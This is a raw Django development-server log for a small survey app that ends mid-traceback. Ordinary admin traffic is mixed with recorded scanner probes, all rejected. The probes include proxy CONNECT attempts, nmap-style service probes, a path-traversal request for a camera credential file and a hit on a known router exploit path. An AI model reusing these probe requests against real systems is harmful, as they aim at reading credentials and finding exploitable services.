[13/Apr/2023 13:02:19] "GET /admin/kysely/vastaus/20/change/ HTTP/1.1" 200 11507
[13/Apr/2023 13:02:19] "GET /static/admin/css/forms.css HTTP/1.1" 200 8944
[13/Apr/2023 13:02:19] "GET /static/admin/js/calendar.js HTTP/1.1" 200 8466
[13/Apr/2023 13:02:19] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 13:02:19] "GET /static/admin/js/admin/DateTimeShortcuts.js HTTP/1.1" 200 19379
[13/Apr/2023 13:02:19] "GET /static/admin/js/prepopulate_init.js HTTP/1.1" 200 586
[13/Apr/2023 13:02:19] "GET /static/admin/css/widgets.css HTTP/1.1" 200 11297
[13/Apr/2023 13:02:19] "GET /static/admin/js/change_form.js HTTP/1.1" 200 606
[13/Apr/2023 13:02:20] "GET /static/admin/img/icon-calendar.svg HTTP/1.1" 200 1086
[13/Apr/2023 13:02:20] "GET /static/admin/img/icon-clock.svg HTTP/1.1" 200 677
[13/Apr/2023 13:02:22] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 13:02:33] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 13:02:33] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 13:02:33] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 13:02:34] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
[13/Apr/2023 13:03:00] "POST / HTTP/1.1" 200 1078
[13/Apr/2023 13:03:02] "GET /kysely/ HTTP/1.1" 200 7651
[13/Apr/2023 13:03:05] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7588
[13/Apr/2023 13:03:05] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 13:30:38] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 13:34:53] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 13:34:53] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 13:34:53] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 13:34:53] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
[13/Apr/2023 13:35:08,449] - Broken pipe from ('80.220.204.224', 62236)
[13/Apr/2023 13:35:08,449] - Broken pipe from ('80.220.204.224', 62234)
[13/Apr/2023 13:35:08,449] - Broken pipe from ('80.220.204.224', 62233)
[13/Apr/2023 13:35:08,449] - Broken pipe from ('80.220.204.224', 62235)
Invalid HTTP_HOST header: 'www.google.com:443'. You may need to add 'www.google.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'www.google.com:443'. You may need to add 'www.google.com' to ALLOWED_HOSTS.
Bad Request: /www.google.com:443
[13/Apr/2023 13:36:54] "CONNECT www.google.com:443 HTTP/1.1" 400 61968
[13/Apr/2023 14:16:16] code 400, message Bad request version ('À\x13À')
[13/Apr/2023 14:16:16] You're accessing the development server over HTTPS, but it only supports HTTP.
[13/Apr/2023 14:28:08] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 14:28:08] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 14:28:08] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 14:28:08] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
Not Found: /favicon.ico
[13/Apr/2023 14:28:08] "GET /favicon.ico HTTP/1.1" 404 2467
[13/Apr/2023 14:28:52] "POST / HTTP/1.1" 200 1078
[13/Apr/2023 14:28:56] "GET /kysely/ HTTP/1.1" 200 7651
[13/Apr/2023 16:55:05] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[13/Apr/2023 16:55:05] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 16:55:09] "GET /admin/kysely/vastaus/22/change/ HTTP/1.1" 200 11519
[13/Apr/2023 16:55:09] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 16:56:03] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[13/Apr/2023 16:56:03] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 16:56:18,964] - Broken pipe from ('80.220.204.224', 63053)
[13/Apr/2023 16:56:18,965] - Broken pipe from ('80.220.204.224', 63054)
Invalid HTTP_HOST header: 'www.baidu.com:443'. You may need to add 'www.baidu.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'www.baidu.com:443'. You may need to add 'www.baidu.com' to ALLOWED_HOSTS.
Bad Request: /www.baidu.com:443
[13/Apr/2023 17:01:38] "CONNECT www.baidu.com:443 HTTP/1.1" 400 61941
[13/Apr/2023 17:03:10] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[13/Apr/2023 17:03:10] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 17:03:12] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[13/Apr/2023 17:03:12] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 17:03:14] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[13/Apr/2023 17:03:14] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 17:03:25,663] - Broken pipe from ('80.220.204.224', 63242)
[13/Apr/2023 17:03:25,663] - Broken pipe from ('80.220.204.224', 63243)
Invalid HTTP_HOST header: 'www.google.com:443'. You may need to add 'www.google.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'www.google.com:443'. You may need to add 'www.google.com' to ALLOWED_HOSTS.
Bad Request: /www.google.com:443
[13/Apr/2023 17:14:11] "CONNECT www.google.com:443 HTTP/1.1" 400 61967
[13/Apr/2023 17:43:31] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[13/Apr/2023 17:43:32] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 17:43:40,680] - Broken pipe from ('80.220.204.224', 63337)
[13/Apr/2023 17:43:40,681] - Broken pipe from ('80.220.204.224', 63336)
Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Bad Request: /google.com:443
[13/Apr/2023 17:53:15] "CONNECT google.com:443 HTTP/1.1" 400 61863
[13/Apr/2023 18:23:39] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[13/Apr/2023 18:23:39] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 18:23:49,429] - Broken pipe from ('80.220.204.224', 63430)
[13/Apr/2023 18:23:49,430] - Broken pipe from ('80.220.204.224', 63429)
[13/Apr/2023 18:23:54] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[13/Apr/2023 18:23:54] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[13/Apr/2023 18:50:38] "GET / HTTP/1.0" 400 62188
Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Bad Request: /google.com:443
[13/Apr/2023 19:21:19] "CONNECT google.com:443 HTTP/1.1" 400 61864
Invalid HTTP_HOST header: 'www.baidu.com:443'. You may need to add 'www.baidu.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'www.baidu.com:443'. You may need to add 'www.baidu.com' to ALLOWED_HOSTS.
Bad Request: /www.baidu.com:443
[13/Apr/2023 20:07:26] "CONNECT www.baidu.com:443 HTTP/1.1" 400 61941
[13/Apr/2023 20:30:16] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 21:30:07] "GET / HTTP/1.1" 200 7651
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[13/Apr/2023 21:53:32] "GET / HTTP/1.0" 400 62150
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[13/Apr/2023 23:21:12] "GET / HTTP/1.0" 400 62669
[13/Apr/2023 23:32:44] code 400, message Bad HTTP/0.9 request type ('Z¥\x01')
[13/Apr/2023 23:32:44] "Z¥     " 400 -
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[14/Apr/2023 00:05:46] "GET / HTTP/1.0" 400 62304
[14/Apr/2023 00:17:36] code 400, message Bad request version ('\x15F,µÍZb/\x89÷Ú\x96RÛ\x07íÑ')
[14/Apr/2023 00:17:36] You're accessing the development server over HTTPS, but it only supports HTTP.
[14/Apr/2023 00:33:07,539] - Broken pipe from ('45.79.163.53', 60468)
[14/Apr/2023 00:33:07] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 00:33:07,739] - Broken pipe from ('45.79.163.53', 60469)
[14/Apr/2023 00:47:38] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 01:07:41] code 400, message Bad HTTP/0.9 request type ("\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03ª\x19Ù\x10º\x93C5À\x9a\x01Å?å\x8apë¦À\x8e\x80Å\x8e\x88\x86#k\x1b\x01\x10}1\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À")
[14/Apr/2023 01:07:41] You're accessing the development server over HTTPS, but it only supports HTTP.
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[14/Apr/2023 01:42:28] "GET / HTTP/1.0" 400 62188
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[14/Apr/2023 01:48:48] "GET / HTTP/1.0" 400 61779
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[14/Apr/2023 01:48:48] "OPTIONS / HTTP/1.0" 400 61807
[14/Apr/2023 01:48:49] code 400, message Bad request version ('RTSP/1.0')
[14/Apr/2023 01:48:49] "OPTIONS / RTSP/1.0" 400 -
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /nice ports,/Trinity.txt.bak
[14/Apr/2023 01:48:49] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 400 61998
[14/Apr/2023 01:48:49] code 400, message Bad request syntax ('\x05\x04\x00\x01\x02\x80\x05\x01\x00\x03')
[14/Apr/2023 01:48:49] "  " 400 -
[14/Apr/2023 01:48:50] code 400, message Bad request syntax ('\x04\x01\x00\x16\x7f\x00\x00\x01root\x00')
[14/Apr/2023 01:48:50] "   root " 400 -
[14/Apr/2023 01:48:51] code 400, message Bad request version ('\x00\x01\x97|\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
[14/Apr/2023 01:48:51] "  (rþ          |                    " 400 -
[14/Apr/2023 01:48:53] code 400, message Bad HTTP/0.9 request type ('\x00')
[14/Apr/2023 01:48:53] "          versionbind   " 400 -
[14/Apr/2023 01:48:53] code 400, message Bad request syntax ('HELP')
[14/Apr/2023 01:48:53] "HELP" 400 -
[14/Apr/2023 01:48:53] code 400, message Bad request syntax ('\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G×÷º,îê²`~ó\x00ý\x82{¹Õ\x96Èw\x9bæÄÛ<=Ûoï\x10n\x00\x00(\x00\x16\x00\x13\x00')
[14/Apr/2023 01:48:53] You're accessing the development server over HTTPS, but it only supports HTTP.
[14/Apr/2023 01:48:53] code 400, message Bad request version ('\x00/\x00')
[14/Apr/2023 01:48:53] You're accessing the development server over HTTPS, but it only supports HTTP.
[14/Apr/2023 01:48:54] code 400, message Bad request version ('0.12\x00')
[14/Apr/2023 01:48:54] "   ¤ÿSMBr    @              @     PC NETWORK PROGRAM 1.0 MICROSOFT NETWORKS 1.03 MICROSOFT NETWORKS 3.0 LANMAN1.0 LM1.2X002 Samba NT LANMAN 1.0 NT LM 0.12 " 400 -
Not Found: /../../mnt/mtd/Config/Account1
[14/Apr/2023 04:59:49] "GET /../../mnt/mtd/Config/Account1 HTTP/1.1" 404 2512
[14/Apr/2023 05:02:59] code 400, message Bad request version ('À\x13À')
[14/Apr/2023 05:02:59] You're accessing the development server over HTTPS, but it only supports HTTP.
[14/Apr/2023 05:05:34] "GET / HTTP/1.1" 200 7651
Not Found: /hudson
[14/Apr/2023 05:51:33] "GET /hudson HTTP/1.1" 404 2449
[14/Apr/2023 05:51:47] code 400, message Bad request syntax ('MGLNDD_68.219.92.212_8080')
[14/Apr/2023 05:51:47] "MGLNDD_68.219.92.212_8080" 400 -
[14/Apr/2023 05:59:17] "GET / HTTP/1.1" 200 7651
Invalid HTTP_HOST header: '127.0.0.1:8080'. You may need to add '127.0.0.1' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: '127.0.0.1:8080'. You may need to add '127.0.0.1' to ALLOWED_HOSTS.
Bad Request: /GponForm/diag_Form
[14/Apr/2023 06:54:59] "POST /GponForm/diag_Form?images/ HTTP/1.1" 400 62622
[14/Apr/2023 06:55:08] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 06:55:08] "GET /static/css/bootstrap.min.css HTTP/1.1" 304 0
[14/Apr/2023 06:55:08] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 304 0
[14/Apr/2023 06:55:08] "GET /static/css/custom.css HTTP/1.1" 304 0
Not Found: /favicon.ico
[14/Apr/2023 06:55:08] "GET /favicon.ico HTTP/1.1" 404 2467
[14/Apr/2023 06:55:17] "GET /admin/ HTTP/1.1" 200 6713
[14/Apr/2023 06:55:17] "GET /static/admin/img/icon-deletelink.svg HTTP/1.1" 200 392
[14/Apr/2023 06:55:19] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[14/Apr/2023 06:55:19] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[14/Apr/2023 07:05:19] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 07:05:22] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 07:05:29] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 07:05:34] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 07:05:34] "GET /static/css/custom.css HTTP/1.1" 200 726
[14/Apr/2023 07:05:34] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
[14/Apr/2023 07:05:34] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
Not Found: /favicon.ico
[14/Apr/2023 07:05:42] "GET /favicon.ico HTTP/1.1" 404 2467
[14/Apr/2023 07:15:12] "GET /admin/ HTTP/1.1" 200 6713
[14/Apr/2023 07:15:14] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[14/Apr/2023 07:15:14] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[14/Apr/2023 07:15:15] "GET /admin/kysely/vastaus/22/change/ HTTP/1.1" 200 11519
[14/Apr/2023 07:15:15] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[14/Apr/2023 07:19:00] "GET /static/css/bootstrap.min.css.map HTTP/1.1" 404 1841
[14/Apr/2023 07:19:00] "GET /static/js/bootstrap.bundle.min.js.map HTTP/1.1" 404 1856
[14/Apr/2023 07:19:38] "GET /admin HTTP/1.1" 301 0
[14/Apr/2023 07:19:38] "GET /admin/ HTTP/1.1" 302 0
[14/Apr/2023 07:19:39] "GET /admin/login/?next=/admin/ HTTP/1.1" 200 2218
[14/Apr/2023 07:19:39] "GET /static/admin/css/base.css HTTP/1.1" 200 20344
[14/Apr/2023 07:19:39] "GET /static/admin/css/dark_mode.css HTTP/1.1" 200 796
[14/Apr/2023 07:19:39] "GET /static/admin/css/nav_sidebar.css HTTP/1.1" 200 2619
[14/Apr/2023 07:19:39] "GET /static/admin/css/login.css HTTP/1.1" 200 958
[14/Apr/2023 07:19:39] "GET /static/admin/css/responsive.css HTTP/1.1" 200 18854
[14/Apr/2023 07:19:39] "GET /static/admin/js/nav_sidebar.js HTTP/1.1" 200 3763
[14/Apr/2023 07:19:39] "GET /static/admin/css/fonts.css HTTP/1.1" 200 423
[14/Apr/2023 07:19:39] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.1" 200 85876
[14/Apr/2023 07:19:39] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.1" 200 85692
[14/Apr/2023 07:20:00] "GET /admin/auth/user/ HTTP/1.1" 200 8966
[14/Apr/2023 07:20:00] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[14/Apr/2023 07:20:00] "GET /static/admin/img/search.svg HTTP/1.1" 200 458
[14/Apr/2023 07:20:00] "GET /static/admin/img/sorting-icons.svg HTTP/1.1" 200 1097
[14/Apr/2023 07:20:03] "GET /admin/auth/user/add/ HTTP/1.1" 200 8024
[14/Apr/2023 07:20:03] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
Invalid HTTP_HOST header: 'localhost:8080'. You may need to add 'localhost' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'localhost:8080'. You may need to add 'localhost' to ALLOWED_HOSTS.
Bad Request: /
[14/Apr/2023 07:29:05] "GET / HTTP/1.0" 400 61994
[14/Apr/2023 07:37:41] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 07:37:41] "GET /static/css/custom.css HTTP/1.1" 200 726
[14/Apr/2023 07:37:41] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[14/Apr/2023 07:37:41] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
Not Found: /favicon.ico
[14/Apr/2023 07:37:41] "GET /favicon.ico HTTP/1.1" 404 2467
[14/Apr/2023 07:48:04] "GET / HTTP/1.1" 200 7651
Not Found: /favicon.ico
[14/Apr/2023 07:48:18] "GET /favicon.ico HTTP/1.1" 404 2464
Invalid HTTP_HOST header: 'api.ipify.org'. You may need to add 'api.ipify.org' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'api.ipify.org'. You may need to add 'api.ipify.org' to ALLOWED_HOSTS.
Bad Request: /http:/api.ipify.org/
[14/Apr/2023 07:48:26] "GET http://api.ipify.org/?format=json HTTP/1.1" 400 62450
Invalid HTTP_HOST header: 'www.shadowserver.org'. You may need to add 'www.shadowserver.org' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
